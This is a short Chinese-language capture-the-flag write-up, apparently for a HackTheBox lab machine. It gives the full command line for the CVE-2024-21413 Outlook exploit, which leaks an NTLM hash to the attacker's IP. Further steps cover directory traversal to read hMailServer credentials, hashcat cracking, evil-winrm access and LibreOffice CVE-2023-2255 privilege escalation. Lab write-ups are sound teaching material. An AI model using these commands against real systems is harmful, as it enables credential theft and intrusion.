拿到ip先端口扫描

然后再hosts里面加上网址

打开网页查看

对网站进行信息收集,发现参数

是一个下载的参数,看看能不能找到漏洞,抓包测试

发现目录遍历漏洞,信息收集后发现这个网站是一个hmailserver的邮件系统,直接去网上找一下这个服务的安装说明和安装的配置文件位置

找到密码,找一个网站解一下md5

https://hashes.com/zh/decrypt/hash

得到账号和密码后直接登录telent发现什么都没有

信息收集找漏洞,发现有一个RCE漏洞

github:https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability

大概意思就是发送一个虚拟的文件,这个虚拟的文件可以获取到Windows的NTML(Windows的密码加密方式)

python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password ADMIN_PASSWORD --sender administrator@mailing.htb --recipient maya@mailing.htb --url "\IP/something" --subject XD

拿到密钥之后,直接进行爆破,NTLM

爆破方法:hashcat -a 0 -m 5600 pass.txt /usr/share/wordlists/rockyou.txt

爆破NTLM就记住这个就好了,5600就是爆破NTLM的

爆破成功后 再最后面加上-show 即可

然后直接使用evill-winrm连接即可

进入maya的Desktop直接就可以查看到user.txt

下一个文件就是root里的,肯定是要提权的,信息收集一下,这个题目和邮件办公有关,找了一下,发现电脑里有

libreoffice

虽然不知道是什么,但是office肯定是办公软件,查了一下确实有漏洞

这个洞还有poc,版本符合,直接梭哈

https://github.com/elweth-sec/CVE-2023-2255

大概的使用方法就是再本地加入命令会自动生成一个文件,将这个文件上传到靶机中,运行就可以了

生成一个odt文件

然后用python传过去

然后修改maya的权限

这个是没有administrators的权限的,再查看一次

已经获取权限

使用 crackmapexec,可以删除 localadmin 中文件

已经获取到,我们直接用impacket-wmiexec登录

下课!

日常分享
最后更新于 2024-09-23